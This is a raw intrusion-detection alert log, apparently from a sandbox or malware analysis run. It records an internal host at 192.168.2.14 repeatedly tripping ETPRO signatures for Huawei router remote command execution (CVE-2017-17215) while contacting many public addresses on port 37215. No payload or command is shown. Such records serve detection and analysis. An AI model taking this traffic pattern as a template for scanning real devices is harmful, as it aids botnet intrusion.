                                                    07/10/24-08:27:13.974355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4423237215192.168.2.1441.55.85.39
                                                    07/10/24-08:27:31.555849TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4199437215192.168.2.14197.83.110.213
                                                    07/10/24-08:26:42.179798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5755837215192.168.2.14197.195.223.80
                                                    07/10/24-08:27:02.923335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5453837215192.168.2.14157.113.82.163
                                                    07/10/24-08:27:07.262409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5592637215192.168.2.1441.249.189.111
                                                    07/10/24-08:27:24.970064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3532037215192.168.2.1459.0.99.178
                                                    07/10/24-08:26:57.515772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4543837215192.168.2.1471.231.245.42
                                                    07/10/24-08:26:43.890192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3722637215192.168.2.14197.64.136.11
                                                    07/10/24-08:27:24.893160TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3427637215192.168.2.14180.235.84.112
                                                    07/10/24-08:26:52.078172TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4406037215192.168.2.1441.193.43.248
                                                    07/10/24-08:27:02.899646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3951637215192.168.2.1414.119.94.70
                                                    07/10/24-08:26:25.447222TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422837215192.168.2.14146.10.115.199
                                                    07/10/24-08:27:20.460013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4030837215192.168.2.14197.115.154.254
                                                    07/10/24-08:26:20.113907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4014037215192.168.2.14101.127.209.78
                                                    07/10/24-08:26:38.596556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602637215192.168.2.14198.201.75.251
                                                    07/10/24-08:26:41.413310TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5756837215192.168.2.14163.69.26.23
                                                    07/10/24-08:26:55.407973TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3438437215192.168.2.14157.18.84.197
                                                    07/10/24-08:27:30.468804TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3818837215192.168.2.14157.200.34.35
                                                    07/10/24-08:26:55.373559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318037215192.168.2.149.83.115.90
                                                    07/10/24-08:27:27.155476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394037215192.168.2.1441.113.61.103
                                                    07/10/24-08:26:28.682326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927637215192.168.2.14172.241.141.191
                                                    07/10/24-08:27:27.175137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5652237215192.168.2.14157.169.66.107
                                                    07/10/24-08:27:20.506153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5484637215192.168.2.1441.86.169.102
                                                    07/10/24-08:26:17.981659TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5220237215192.168.2.14197.71.105.78
                                                    07/10/24-08:26:18.013020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3610037215192.168.2.14100.251.33.173
                                                    07/10/24-08:26:20.171305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5578437215192.168.2.1441.39.217.114
                                                    07/10/24-08:26:49.861410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5306437215192.168.2.1441.138.245.116
                                                    07/10/24-08:27:23.967998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4602037215192.168.2.1441.120.130.143
                                                    07/10/24-08:26:33.259774TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3872637215192.168.2.1441.165.83.146
                                                    07/10/24-08:26:34.179823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5745637215192.168.2.1441.18.33.179
                                                    07/10/24-08:26:20.143490TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5631437215192.168.2.1441.109.193.11
                                                    07/10/24-08:26:28.826796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057637215192.168.2.14147.101.133.223
                                                    07/10/24-08:27:32.612334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4117037215192.168.2.14157.113.131.240
                                                    07/10/24-08:27:05.164451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3293837215192.168.2.1441.180.38.70
                                                    07/10/24-08:26:11.452655TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909037215192.168.2.1446.225.21.207
                                                    07/10/24-08:26:25.505389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4590237215192.168.2.14157.166.22.215
                                                    07/10/24-08:26:18.010267TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4598437215192.168.2.1441.233.67.42
                                                    07/10/24-08:27:23.903843TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3284037215192.168.2.1441.160.32.81
                                                    07/10/24-08:26:13.837013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5974237215192.168.2.14157.239.93.130
                                                    07/10/24-08:26:45.622921TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4273837215192.168.2.1492.54.93.37
                                                    07/10/24-08:27:05.164336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100437215192.168.2.1465.211.15.131
                                                    07/10/24-08:26:53.177713TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5852037215192.168.2.1451.158.52.144
                                                    07/10/24-08:26:38.518117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5009637215192.168.2.14197.253.154.255
                                                    07/10/24-08:27:31.467036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001637215192.168.2.14197.147.154.119
                                                    07/10/24-08:26:15.869834TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3521637215192.168.2.14157.172.135.68
                                                    07/10/24-08:27:28.046169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3579237215192.168.2.14153.192.190.156
                                                    07/10/24-08:26:49.844556TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5240637215192.168.2.1492.64.3.23
                                                    07/10/24-08:26:45.647215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4430637215192.168.2.1458.187.154.28
                                                    07/10/24-08:27:23.909366TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287837215192.168.2.14197.68.66.27
                                                    07/10/24-08:26:29.764687TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037037215192.168.2.1441.250.32.71
                                                    07/10/24-08:26:52.036336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5822437215192.168.2.14197.51.107.218
                                                    07/10/24-08:27:22.540241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5361837215192.168.2.1449.83.84.161
                                                    07/10/24-08:26:28.776724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055437215192.168.2.14204.32.250.17
                                                    07/10/24-08:26:14.819021TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3956837215192.168.2.14157.161.171.203
                                                    07/10/24-08:27:28.055753TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130037215192.168.2.14197.253.189.195
                                                    07/10/24-08:26:43.833151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4575637215192.168.2.14157.240.223.245
                                                    07/10/24-08:27:11.506904TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4355837215192.168.2.14207.170.66.244
                                                    07/10/24-08:27:31.522185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236637215192.168.2.14157.66.110.147
                                                    07/10/24-08:26:53.171855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3811237215192.168.2.14157.245.146.103
                                                    07/10/24-08:26:59.663550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5119237215192.168.2.14197.40.35.35
                                                    07/10/24-08:27:13.896950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4389837215192.168.2.14157.133.2.56
                                                    07/10/24-08:27:10.605633TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5566837215192.168.2.14157.128.146.158
                                                    07/10/24-08:27:34.117447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3582237215192.168.2.1441.232.67.75
                                                    07/10/24-08:27:19.161022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5652237215192.168.2.14141.84.132.228
                                                    07/10/24-08:27:31.555849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867037215192.168.2.14197.140.84.139
                                                    07/10/24-08:26:31.079428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5031437215192.168.2.14157.141.78.203
                                                    07/10/24-08:26:11.524637TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306237215192.168.2.1441.65.39.223
                                                    07/10/24-08:26:51.951263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5354637215192.168.2.14157.59.46.160
                                                    07/10/24-08:26:28.929842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4977237215192.168.2.1441.136.34.247
                                                    07/10/24-08:26:17.956514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3844837215192.168.2.14157.92.180.88
                                                    07/10/24-08:27:22.771022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5998037215192.168.2.14197.126.80.150
                                                    07/10/24-08:26:29.755457TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5890237215192.168.2.14157.46.41.199
                                                    07/10/24-08:26:45.623094TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3401437215192.168.2.14157.117.20.233
                                                    07/10/24-08:26:49.815817TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702637215192.168.2.1441.183.189.157
                                                    07/10/24-08:27:22.926905TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6004237215192.168.2.1495.196.242.223
                                                    07/10/24-08:26:23.347841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173437215192.168.2.14197.76.61.119
                                                    07/10/24-08:26:28.842346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201037215192.168.2.14197.244.54.244
                                                    07/10/24-08:26:41.560100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048237215192.168.2.1441.214.150.221
                                                    07/10/24-08:27:14.821258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4264437215192.168.2.14157.19.124.229
                                                    07/10/24-08:27:07.389913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4897837215192.168.2.14197.149.90.66
                                                    07/10/24-08:26:18.004122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3546637215192.168.2.14197.249.132.62
                                                    07/10/24-08:27:17.074634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4757037215192.168.2.1441.154.152.221
                                                    07/10/24-08:27:23.893892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4184037215192.168.2.1441.112.136.237
                                                    07/10/24-08:27:19.322147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5714437215192.168.2.14197.53.105.240
                                                    07/10/24-08:27:32.576529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5686037215192.168.2.1480.234.17.179
                                                    07/10/24-08:27:32.605681TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088037215192.168.2.14197.41.173.227
                                                    07/10/24-08:26:38.601192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714237215192.168.2.14197.175.36.173
                                                    07/10/24-08:27:10.695827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4831237215192.168.2.1481.93.141.160
                                                    07/10/24-08:26:59.804848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5229437215192.168.2.1441.53.82.109
                                                    07/10/24-08:26:38.527687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216437215192.168.2.14197.1.12.253
                                                    07/10/24-08:26:23.324879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4129837215192.168.2.14193.79.142.185
                                                    07/10/24-08:27:08.392064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5834637215192.168.2.14197.140.173.110
                                                    07/10/24-08:26:18.037759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4110837215192.168.2.14197.84.148.35
                                                    07/10/24-08:27:05.112679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3807437215192.168.2.1441.219.98.37
                                                    07/10/24-08:26:41.454005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4617837215192.168.2.14157.12.243.202
                                                    07/10/24-08:27:19.287568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672037215192.168.2.14157.53.99.104
                                                    07/10/24-08:27:02.906092TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4057437215192.168.2.1441.188.170.148
                                                    07/10/24-08:26:34.238192TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4675437215192.168.2.14197.18.215.161
                                                    07/10/24-08:27:14.867172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4995237215192.168.2.14220.219.233.220
                                                    07/10/24-08:27:17.027039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3297837215192.168.2.1487.196.83.231
                                                    07/10/24-08:26:43.745002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5270837215192.168.2.14157.215.219.168
                                                    07/10/24-08:26:57.664786TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5028837215192.168.2.1441.164.56.35
                                                    07/10/24-08:26:38.652813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3956437215192.168.2.14154.190.254.211
                                                    07/10/24-08:26:59.630762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4469637215192.168.2.14157.187.42.10
                                                    07/10/24-08:26:11.112996TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354637215192.168.2.14197.174.73.168
                                                    07/10/24-08:27:19.279611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5300837215192.168.2.1441.120.225.208
                                                    07/10/24-08:27:32.592658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772837215192.168.2.14201.128.33.31
                                                    07/10/24-08:26:25.485582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5627437215192.168.2.14167.253.197.24
                                                    07/10/24-08:27:23.893892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663037215192.168.2.14197.130.118.243
                                                    07/10/24-08:27:30.505876TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4237037215192.168.2.14157.177.168.50
                                                    07/10/24-08:27:32.621614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3976837215192.168.2.14157.64.149.14
                                                    07/10/24-08:26:42.392755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5742237215192.168.2.14197.92.255.180
                                                    07/10/24-08:26:53.147392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867837215192.168.2.1481.7.51.122
                                                    07/10/24-08:27:05.200421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4289637215192.168.2.14157.166.231.92
                                                    07/10/24-08:26:31.061341TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5454837215192.168.2.14197.146.168.131
                                                    07/10/24-08:26:57.682108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339237215192.168.2.14157.87.136.99
                                                    07/10/24-08:27:22.930500TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5752437215192.168.2.14157.245.57.56
                                                    07/10/24-08:27:07.369719TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4670637215192.168.2.1441.28.22.216
                                                    07/10/24-08:26:26.482822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6074437215192.168.2.1441.145.141.8
                                                    07/10/24-08:27:22.845184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4451837215192.168.2.14197.157.130.35
                                                    07/10/24-08:27:22.571797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5389437215192.168.2.144.6.137.75
                                                    07/10/24-08:26:49.911246TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5486637215192.168.2.14119.10.24.173
                                                    07/10/24-08:26:29.864679TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3668237215192.168.2.1441.141.98.200
                                                    07/10/24-08:27:11.612567TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056237215192.168.2.14191.150.72.78
                                                    07/10/24-08:27:30.529525TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5910637215192.168.2.14157.13.226.94
                                                    07/10/24-08:26:41.476228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705437215192.168.2.14157.127.210.185
                                                    07/10/24-08:26:59.835499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3485837215192.168.2.1441.217.3.12
                                                    07/10/24-08:26:25.442977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5845437215192.168.2.1466.110.90.206
                                                    07/10/24-08:26:11.592748TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4135637215192.168.2.1441.35.122.61
                                                    07/10/24-08:26:14.823884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4237237215192.168.2.14157.38.113.225
                                                    07/10/24-08:27:02.859176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4575637215192.168.2.1441.38.22.19
                                                    07/10/24-08:26:38.591498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5858237215192.168.2.14146.150.150.17
                                                    07/10/24-08:26:14.621778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5524637215192.168.2.14157.7.141.249
                                                    07/10/24-08:26:15.857451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224037215192.168.2.14202.80.64.188
                                                    07/10/24-08:26:25.418573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042037215192.168.2.14150.162.239.60
                                                    07/10/24-08:26:29.847226TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3540037215192.168.2.14157.54.200.84
                                                    07/10/24-08:26:59.724469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5840037215192.168.2.14197.95.161.233
                                                    07/10/24-08:27:05.240759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3422637215192.168.2.14197.223.151.202
                                                    07/10/24-08:27:27.040022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4594637215192.168.2.14197.94.113.157
                                                    07/10/24-08:27:13.956024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056237215192.168.2.1441.94.45.74
                                                    07/10/24-08:27:32.600329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721637215192.168.2.14157.3.185.184
                                                    07/10/24-08:26:15.880564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5626437215192.168.2.14157.56.85.157
                                                    07/10/24-08:26:55.350544TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3894237215192.168.2.1441.62.31.43
                                                    07/10/24-08:26:15.869789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655437215192.168.2.1444.156.79.63
                                                    07/10/24-08:26:34.211493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4739237215192.168.2.1441.0.31.10
                                                    07/10/24-08:26:17.976557TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4213237215192.168.2.14115.249.24.207
                                                    07/10/24-08:26:14.623309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635837215192.168.2.14157.97.0.66
                                                    07/10/24-08:26:43.919816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5926637215192.168.2.14157.65.161.243
                                                    07/10/24-08:27:23.840251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5433037215192.168.2.14197.22.77.13
                                                    07/10/24-08:26:34.209282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746237215192.168.2.14157.143.36.249
                                                    07/10/24-08:26:36.422822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5902237215192.168.2.14157.81.29.221
                                                    07/10/24-08:27:05.116330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5591437215192.168.2.1441.137.205.4
                                                    07/10/24-08:26:36.383866TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3391037215192.168.2.14197.99.158.218
                                                    07/10/24-08:26:15.861414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5016637215192.168.2.1441.46.168.232
                                                    07/10/24-08:26:52.018134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6008837215192.168.2.14157.4.227.167
                                                    07/10/24-08:26:55.354961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704637215192.168.2.14157.120.126.187
                                                    07/10/24-08:27:10.576651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3713437215192.168.2.1441.176.5.65
                                                    07/10/24-08:26:11.165581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768437215192.168.2.14157.72.125.10
                                                    07/10/24-08:26:15.809850TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5608637215192.168.2.14157.87.221.20
                                                    07/10/24-08:26:36.388728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4372437215192.168.2.14157.245.185.69
                                                    07/10/24-08:26:42.364562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3705237215192.168.2.1441.217.126.71
                                                    07/10/24-08:26:13.798574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5733637215192.168.2.14223.189.137.228
                                                    07/10/24-08:27:07.393645TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4467037215192.168.2.1441.245.94.53
                                                    07/10/24-08:26:59.657792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6034037215192.168.2.14197.203.191.135
                                                    07/10/24-08:26:43.896757TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5544637215192.168.2.1441.49.157.93
                                                    07/10/24-08:26:20.162511TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746837215192.168.2.14197.251.112.72
                                                    07/10/24-08:26:20.177629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5647837215192.168.2.14157.58.239.218
                                                    07/10/24-08:27:08.392563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030637215192.168.2.1420.138.249.148
                                                    07/10/24-08:27:11.523000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3800237215192.168.2.14197.225.60.225
                                                    07/10/24-08:27:30.499089TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4525837215192.168.2.1441.245.94.229
                                                    07/10/24-08:26:43.872058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5712037215192.168.2.14197.242.189.107
                                                    07/10/24-08:26:47.945197TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4756237215192.168.2.14197.57.24.206
                                                    07/10/24-08:26:57.531122TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4052837215192.168.2.14157.34.150.65
                                                    07/10/24-08:26:25.478512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909037215192.168.2.1441.146.30.225
                                                    07/10/24-08:27:33.744947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4760237215192.168.2.14157.43.179.49
                                                    07/10/24-08:27:08.441013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162837215192.168.2.14197.241.138.43
                                                    07/10/24-08:26:22.258130TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3651637215192.168.2.14157.148.19.195
                                                    07/10/24-08:26:43.655203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5512437215192.168.2.14197.101.32.152
                                                    07/10/24-08:27:05.213994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316837215192.168.2.14148.101.45.8
                                                    07/10/24-08:27:17.078747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5355037215192.168.2.1441.118.195.8
                                                    07/10/24-08:26:14.817942TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4358437215192.168.2.14188.102.70.72
                                                    07/10/24-08:26:15.874379TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3391437215192.168.2.14116.42.107.254
                                                    07/10/24-08:26:55.343631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4479437215192.168.2.14135.146.210.228
                                                    07/10/24-08:26:11.587895TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3837237215192.168.2.14197.10.15.85
                                                    07/10/24-08:27:10.727335TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4321437215192.168.2.14197.33.115.1
                                                    07/10/24-08:27:24.894621TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5222237215192.168.2.14197.93.193.0
